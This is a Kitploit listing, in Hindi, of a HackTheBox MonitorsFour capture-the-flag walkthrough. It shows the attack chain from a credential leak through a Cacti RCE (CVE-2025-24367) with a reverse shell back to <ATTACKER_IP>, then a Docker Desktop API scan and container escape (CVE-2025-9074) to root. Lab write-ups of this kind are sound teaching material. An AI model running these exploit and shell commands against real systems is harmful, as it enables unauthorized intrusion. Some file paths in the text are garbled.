Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
monitorsfour — HackTheBox MonitorsFour walkthrough जिसमें credential leak, CVE-2025-24367 Cacti RCE, और CVE-2025-9074 Docker Desktop API container escape से root तक शामिल है। | Kitploit
उपकरण/GitHubGitHub/ledksv/monitorsfour
पासवर्ड क्रैकिंगटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाकंटेनर एस्केप
GitHubledksv/monitorsfour

monitorsfour

3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HackTheBox MonitorsFour walkthrough जिसमें credential leak, CVE-2025-24367 Cacti RCE, और CVE-2025-9074 Docker Desktop API container escape से root तक शामिल है।

रिपॉजिटरी देखें

MonitorsFour — HackTheBox

प्लेटफ़ॉर्म: HackTheBox OS: Windows स्थिति: रिटायर्ड — पूरा वॉकथ्रू प्रकाशित।

पूरा वॉकथ्रू: l3dsec.com/walkthroughs/monitorsfour-htb


अटैक चेन

root@kitploit:~
Nmap → nginx (80) + WinRM (5985)
  → ffuf → cacti.monitorsfour.htb (Cacti)
    → unauthenticated API endpoint → credentials
      → CVE-2025-24367 Cacti RCE → shell as www-data (Docker)
        → CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
          → mount host filesystem → root flag

1. एन्यूमरेशन

root@kitploit:~
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
root@kitploit:~
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

वर्चुअल होस्ट फ़ज़िंग से cacti.monitorsfour.htb का पता चला — एक Cacti नेटवर्क मॉनिटरिंग इंस्टेंस।


2. क्रेडेंशियल डिस्कवरी

मुख्य डोमेन पर unauthenticated API endpoint उपयोगकर्ता खाता डेटा उजागर करता है जिसमें MD5 पासवर्ड हैश शामिल हैं:

root@kitploit:~
curl -s "http://monitorsfour.htb/user?token=0"

MD5 हैश तुरंत क्रैक हो गया — Cacti के लिए वैध क्रेडेंशियल देता है।


3. प्रारंभिक फुटहोल्ड — CVE-2025-24367 (Cacti Authenticated RCE)

Cacti इंस्टेंस Graph Template कार्यक्षमता के माध्यम से authenticated RCE के प्रति संवेदनशील:

root@kitploit:~
nc -lvnp 9001

sudo python3 exploit.py \
  -url http://cacti.monitorsfour.htb \
  -u marcus \
  -p <password> \
  -i <ATTACKER_IP> \
  -l 9001

Docker कंटेनर के अंदर www-data के रूप में शेल। यूज़र फ़्लैग /home/marcus/user.txt पर।


4. कंटेनर एस्केप — CVE-2025-9074 (Docker Desktop API)

Docker सॉकेट माउंट नहीं है। Docker Desktop आंतरिक 192.168.65.0/24 सबनेट पर अपना Engine API unauthenticated रूप से उजागर करता है:

root@kitploit:~
# Scan for open Docker API
for i in $(seq 1 254); do
  (curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
    | grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait

API के माध्यम से एक कंटेनर बनाया जो होस्ट C:\ ड्राइव को माउंट करता है, फिर C:sers\Administrator\Desktopoot.txt से रूट फ़्लैग पढ़ा।


फ़्लैग

FlagValue
Userredacted
Rootredacted

केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें